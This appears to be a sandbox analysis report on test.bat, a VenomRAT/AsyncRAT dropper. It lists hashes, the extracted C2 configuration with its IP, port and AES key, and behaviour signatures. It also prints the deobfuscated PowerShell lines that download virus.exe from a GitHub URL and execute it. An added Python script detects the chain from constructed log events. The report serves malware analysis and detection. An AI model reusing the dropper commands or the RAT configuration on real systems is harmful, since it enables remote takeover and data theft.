
General

  • Target

    test.bat

  • Size

    171KB

  • Sample

    241210-2vakbsykeq

  • MD5

    50143263c2d75d9d835e7ee09d4206bb

  • SHA1

    5bc6c41e0f76004c48f1471d2d0dad7438cd72ab

  • SHA256

    7f3067fd568421d59b16e35bdd9cbe94b3be7ce8b77e06b5ed4475fc70c683da

  • SHA512

    1910b62136432ed8c26d050b4faf7d68d7b71fbc8bd190da9bb6cc9910ab0ff5a52882997832d50b7776e7cd017428fe86c1e0679b5c3100a686f5ba909d55b6

  • SSDEEP

    192:CnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnF:q

Malware Config

Extracted

Language

ps1

Deobfuscated

    $url = "https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe"
    $output = "C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\virus.exe"
    invoke-webrequest -uri $url -outfile $output
    start-process -filepath $output -wait

URLs

exe.dropper

https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

66.66.146.74:9511

Mutex

8906005788005HTGF

Attributes
  • delay

    1

  • install

    true

  • install_file

    WINDOWS.exe

  • install_folder

    %AppData%

aes.plain

XesRYlphPGk0fRPQHQW5A8dUZSHRkkUq

Targets

    • Target

      test.bat

    • Size

      171KB

    • MD5

      50143263c2d75d9d835e7ee09d4206bb

    • SHA1

      5bc6c41e0f76004c48f1471d2d0dad7438cd72ab

    • SHA256

      7f3067fd568421d59b16e35bdd9cbe94b3be7ce8b77e06b5ed4475fc70c683da

    • SHA512

      1910b62136432ed8c26d050b4faf7d68d7b71fbc8bd190da9bb6cc9910ab0ff5a52882997832d50b7776e7cd017428fe86c1e0679b5c3100a686f5ba909d55b6

    • SSDEEP

      192:CnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnF:q

    • AsyncRat

      AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers. The version string extracted above identifies this build as VenomRAT, an AsyncRAT fork, which is why the sandbox files it under the AsyncRAT family.

    • Asyncrat family

    • Async RAT payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest.

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.
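
The deobfuscated dropper, the extracted C2 configuration and the signature list above give enough indicators for a first-pass detection. The Python below is an added example, not tria.ge output and not the sample's own code. It resolves the `$url`/`$output` variables in a PowerShell download-and-execute one-liner of the shape shown in the Deobfuscated block, then scans a handful of constructed Sysmon-style events (process creation, file write, network connection, plus a PowerShell script block) for the chain the signatures describe: PowerShell fetching a PE into the user's Temp directory and executing it, the dropped executable writing `WINDOWS.exe` under `%AppData%`, and an outbound connection to `66.66.146.74:9511`. The events and the user name `bob` are made up for the example; the expansion of `%AppData%` to `AppData\Roaming` is an assumption, as is the event field naming, which mimics Sysmon but is not a sandbox capture.

```python
"""Added example: IOC-driven detection for the dropper chain and AsyncRAT/VenomRAT
C2 described in this report. Not tria.ge output and not the sample's own code;
the events below are constructed, Sysmon-style records, not sandbox captures."""
import re

# Indicators copied from the report above.
DROPPER_URL = "https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe"
C2 = ("66.66.146.74", 9511)
INSTALL_FILE = "WINDOWS.exe"   # install_file, written into install_folder %AppData%

# Assumption: %AppData% expands to ...\AppData\Roaming for the logged-on user.
INSTALL_SUFFIX = ("\\appdata\\roaming\\" + INSTALL_FILE).lower()
USER_TEMP_RE = re.compile(r"\\appdata\\local\\temp\\", re.I)

# PowerShell patterns for the download-then-execute chain in the Deobfuscated block.
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"')
DOWNLOAD_RE = re.compile(r"invoke-webrequest\b.*?-uri\s+(\S+).*?-outfile\s+(\S+)", re.I)
START_RE = re.compile(r"start-process\b.*?-filepath\s+(\S+)", re.I)


def extract_dropper(script: str):
    """Resolve $var assignments and return what the script downloads and runs,
    or None if it is not an Invoke-WebRequest + Start-Process chain."""
    variables = dict(ASSIGN_RE.findall(script))

    def deref(token: str) -> str:
        token = token.strip("\"'")
        return variables.get(token[1:], token) if token.startswith("$") else token

    download, start = DOWNLOAD_RE.search(script), START_RE.search(script)
    if not (download and start):
        return None
    url = deref(download.group(1))
    outfile = deref(download.group(2))
    started = deref(start.group(1))
    return {"url": url, "outfile": outfile, "executed": outfile.lower() == started.lower()}


def scan_events(events):
    """Return (rule, evidence) pairs for every event that matches the chain."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 4104:                                   # PowerShell script block
            d = extract_dropper(ev["ScriptBlockText"])
            if d and d["executed"] and USER_TEMP_RE.search(d["outfile"]):
                findings.append(("powershell_download_to_temp_and_execute", d["url"]))
            if d and d["url"] == DROPPER_URL:
                findings.append(("known_dropper_url", d["url"]))
        elif eid == 1:                                    # process creation
            if "powershell.exe" in ev["ParentImage"].lower() and USER_TEMP_RE.search(ev["Image"]):
                findings.append(("exe_in_temp_spawned_by_powershell", ev["Image"]))
        elif eid == 11:                                   # file creation
            if ev["TargetFilename"].lower().endswith(INSTALL_SUFFIX):
                findings.append(("asyncrat_install_file_written", ev["TargetFilename"]))
        elif eid == 3:                                    # network connection
            if (ev["DestinationIp"], int(ev["DestinationPort"])) == C2:
                findings.append(("asyncrat_c2_connection",
                                 f"{ev['DestinationIp']}:{ev['DestinationPort']}"))
    return findings


# Constructed script block: the Deobfuscated one-liner with the Temp path written
# as a plain Windows path (the report renders its backslashes escaped).
DROPPER_SCRIPT = r'''$url = "https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe"
$output = "C:\Users\$env:UserName\AppData\Local\Temp\virus.exe"
invoke-webrequest -uri $url -outfile $output
start-process -filepath $output -wait'''

# Constructed events; only the indicators are real, everything else is made up.
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText": DROPPER_SCRIPT},
    {"EventID": 1, "Image": r"C:\Users\bob\AppData\Local\Temp\virus.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 11, "Image": r"C:\Users\bob\AppData\Local\Temp\virus.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Roaming\WINDOWS.exe"},
    {"EventID": 3, "Image": r"C:\Users\bob\AppData\Roaming\WINDOWS.exe",
     "DestinationIp": "66.66.146.74", "DestinationPort": 9511},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},   # benign noise
]

if __name__ == "__main__":
    for rule, evidence in scan_events(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

The event IDs follow the conventions a Windows host would actually log: Sysmon 1 (process creation), 3 (network connection) and 11 (file creation), and Windows PowerShell 4104 (script block logging, which records the deobfuscated script even when the .bat wrapper is obfuscated). The first two rules are behavioural and survive a change of URL or C2; the last two are tied to this sample's indicators and should be expected to age quickly.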

MITRE ATT&CK Enterprise v15

Tasks
